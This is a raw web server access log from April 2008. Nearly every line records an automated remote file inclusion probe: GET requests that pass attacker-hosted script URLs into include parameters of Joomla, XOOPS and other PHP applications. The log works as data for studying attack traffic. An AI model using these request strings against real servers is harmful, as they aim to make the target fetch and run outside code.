88.191.13.166 - - [17/Apr/2008:17:03:42 -0700] "GET /logs/access_080215.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
140.113.4.81 - - [17/Apr/2008:17:03:42 -0700] "GET /index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [17/Apr/2008:17:03:42 -0700] "GET /logs/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.147.108 - - [17/Apr/2008:17:03:55 -0700] "GET /logs/access_080308.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.147.108 - - [17/Apr/2008:17:03:58 -0700] "GET /index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.147.108 - - [17/Apr/2008:17:03:59 -0700] "GET /logs/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.244.247.47 - - [17/Apr/2008:17:03:59 -0700] "GET /logs/access_080215.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.241.215.166 - - [17/Apr/2008:17:04:02 -0700] "GET /logs/access_080215.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.147.108 - - [17/Apr/2008:17:04:11 -0700] "GET /logs/access_080215.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:04:19 -0700] "GET /logs/access_080127.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:04:20 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:04:20 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.146.251.182 - - [17/Apr/2008:17:04:24 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.twistyou.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
203.146.251.182 - - [17/Apr/2008:17:04:24 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.twistyou.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
88.84.147.108 - - [17/Apr/2008:17:04:37 -0700] "GET /logs/access_080215.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.170.179.50 - - [17/Apr/2008:17:04:39 -0700] "GET /logs/access_080215.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [17/Apr/2008:17:04:55 -0700] "GET /logs/access_080215.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.90.30.31 - - [17/Apr/2008:17:05:09 -0700] "GET /logs/index2.php?page=http://priottalo.altervista.org/php5/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
78.90.30.31 - - [17/Apr/2008:17:05:15 -0700] "GET /index2.php?page=http://priottalo.altervista.org/php5/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
140.113.4.81 - - [17/Apr/2008:17:05:25 -0700] "GET /logs/access_080215.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.67.202.9 - - [17/Apr/2008:17:05:53 -0700] "GET /logs/access_080312.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.9 - - [17/Apr/2008:17:05:54 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.9 - - [17/Apr/2008:17:05:54 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:06:01 -0700] "GET /logs/access_080213.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.215.166 - - [17/Apr/2008:17:06:05 -0700] "GET /logs/access_080308.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.215.166 - - [17/Apr/2008:17:06:08 -0700] "GET /index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.215.166 - - [17/Apr/2008:17:06:09 -0700] "GET /logs/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.251.182 - - [17/Apr/2008:17:06:11 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.twistyou.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
203.146.251.182 - - [17/Apr/2008:17:06:11 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.twistyou.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:06:37 -0700] "GET /logs/access_080127.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:06:37 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:06:37 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:06:46 -0700] "GET /logs/access_080213.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:07:11 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:07:11 -0700] "GET /send_reminders.php?includedir=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:07:11 -0700] "GET /logs/send_reminders.php?includedir=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:07:13 -0700] "GET /logs/access_080112.log/send_reminders.php?includedir=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.126.108.198 - - [17/Apr/2008:17:07:16 -0700] "GET /logs/access_080308.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.75.54 - - [17/Apr/2008:17:07:17 -0700] "GET /logs/access_071229.log//cyberfolio/portfolio/msg/view.php?av=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.75.54 - - [17/Apr/2008:17:07:17 -0700] "GET //cyberfolio/portfolio/msg/view.php?av=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.75.54 - - [17/Apr/2008:17:07:17 -0700] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [17/Apr/2008:17:07:20 -0700] "GET /index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [17/Apr/2008:17:07:22 -0700] "GET /logs/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.170.179.50 - - [17/Apr/2008:17:07:34 -0700] "GET /logs/access_080308.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.170.179.50 - - [17/Apr/2008:17:07:36 -0700] "GET /index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
195.170.179.50 - - [17/Apr/2008:17:07:37 -0700] "GET /logs/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.215.166 - - [17/Apr/2008:17:07:54 -0700] "GET /logs/access_080215.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.75.54 - - [17/Apr/2008:17:08:10 -0700] "GET /logs/access_080218.log//cyberfolio/portfolio/msg/view.php?av=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:08:18 -0700] "GET /logs/access_080120.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:08:18 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:08:19 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.170.179.50 - - [17/Apr/2008:17:08:28 -0700] "GET /logs/access_080312.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.75.54 - - [17/Apr/2008:17:08:37 -0700] "GET /logs/access_080218.log//cyberfolio/portfolio/msg/view.php?av=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.75.54 - - [17/Apr/2008:17:08:37 -0700] "GET //cyberfolio/portfolio/msg/view.php?av=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.75.54 - - [17/Apr/2008:17:08:38 -0700] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.75.54 - - [17/Apr/2008:17:08:39 -0700] "GET /logs/access_080215.log//cyberfolio/portfolio/msg/view.php?av=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:08:50 -0700] "GET /logs/access_080324.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:08:50 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:08:51 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:08:52 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.255.121.113 - - [17/Apr/2008:17:09:21 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.255.121.113 - - [17/Apr/2008:17:09:22 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.255.121.113 - - [17/Apr/2008:17:09:23 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.126.108.198 - - [17/Apr/2008:17:09:36 -0700] "GET /logs/access_080308.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [17/Apr/2008:17:09:39 -0700] "GET /index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [17/Apr/2008:17:09:43 -0700] "GET /logs/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.145.147.54 - - [17/Apr/2008:17:09:51 -0700] "GET /logs/access_080308.log/senetman/html/index.php?page=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.145.147.54 - - [17/Apr/2008:17:09:51 -0700] "GET /senetman/html/index.php?page=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.145.147.54 - - [17/Apr/2008:17:09:52 -0700] "GET /logs/senetman/html/index.php?page=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.253.200 - - [17/Apr/2008:17:09:58 -0700] "GET /logs/access_080312.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:10:27 -0700] "GET /logs/access_080120.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:10:27 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:10:27 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:10:29 -0700] "GET /logs/access_080324.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:10:30 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:10:30 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:10:31 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:10:46 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:10:46 -0700] "GET //config/dbutil.bck.php?confdir=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:10:46 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.240.146 - - [17/Apr/2008:17:10:57 -0700] "GET /logs/access_080312.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:11:12 -0700] "GET /logs/access_080129.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
99.235.196.68 - - [17/Apr/2008:17:11:17 -0700] "GET /logs/access_080226.log//crontab/run_billing.php?config[include_dir]=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
99.235.196.68 - - [17/Apr/2008:17:11:17 -0700] "GET //crontab/run_billing.php?config[include_dir]=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
99.235.196.68 - - [17/Apr/2008:17:11:18 -0700] "GET /logs//crontab/run_billing.php?config[include_dir]=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.145.147.54 - - [17/Apr/2008:17:11:54 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.70.11 - - [17/Apr/2008:17:12:30 -0700] "GET /logs/protection.php?action=logout&siteurl=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
82.192.70.11 - - [17/Apr/2008:17:12:31 -0700] "GET /protection.php?action=logout&siteurl=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
80.40.126.41 - - [17/Apr/2008:17:12:40 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
80.40.126.41 - - [17/Apr/2008:17:12:41 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 200 50 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
209.200.253.200 - - [17/Apr/2008:17:12:47 -0700] "GET /logs/access_080211.log/errors.php?error=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.200.253.200 - - [17/Apr/2008:17:12:47 -0700] "GET /errors.php?error=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.200.253.200 - - [17/Apr/2008:17:12:47 -0700] "GET /logs/errors.php?error=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.192.70.11 - - [17/Apr/2008:17:12:48 -0700] "GET /index.php?pagina=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
82.192.70.11 - - [17/Apr/2008:17:12:50 -0700] "GET /logs/index.php?pagina=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
208.69.192.170 - - [17/Apr/2008:17:12:53 -0700] "GET /logs/access_080211.log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/dalnet.kopet/up.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [17/Apr/2008:17:12:58 -0700] "GET /logs/access_080211.log/errors.php?error=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [17/Apr/2008:17:12:58 -0700] "GET /errors.php?error=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [17/Apr/2008:17:12:58 -0700] "GET /logs/errors.php?error=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [17/Apr/2008:17:13:28 -0700] "GET /logs/access_080215.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [17/Apr/2008:17:13:44 -0700] "GET /logs/access_080215.log//index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.priottalo.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [17/Apr/2008:17:13:47 -0700] "GET //index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.priottalo.altervista.org/php5/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [17/Apr/2008:17:13:48 -0700] "GET /logs//index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.priottalo.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.247.47 - - [17/Apr/2008:17:14:01 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.247.47 - - [17/Apr/2008:17:14:01 -0700] "GET //ashnews.php?pathtoashnews=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.247.47 - - [17/Apr/2008:17:14:01 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.247.47 - - [17/Apr/2008:17:14:01 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.247.47 - - [17/Apr/2008:17:14:01 -0700] "GET //ashnews.php?pathtoashnews=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.247.47 - - [17/Apr/2008:17:14:02 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:14:10 -0700] "GET /logs/access_080129.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.95.209 - - [17/Apr/2008:17:14:19 -0700] "GET /logs/access_080321.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.68.95.209 - - [17/Apr/2008:17:14:27 -0700] "GET /logs/access_080321.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
209.200.253.200 - - [17/Apr/2008:17:14:38 -0700] "GET /logs/access_080127.log/errors.php?error=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.155.165.40 - - [17/Apr/2008:17:14:53 -0700] "GET /logs/access_080308.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [17/Apr/2008:17:14:53 -0700] "GET /logs/access_080127.log/errors.php?error=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
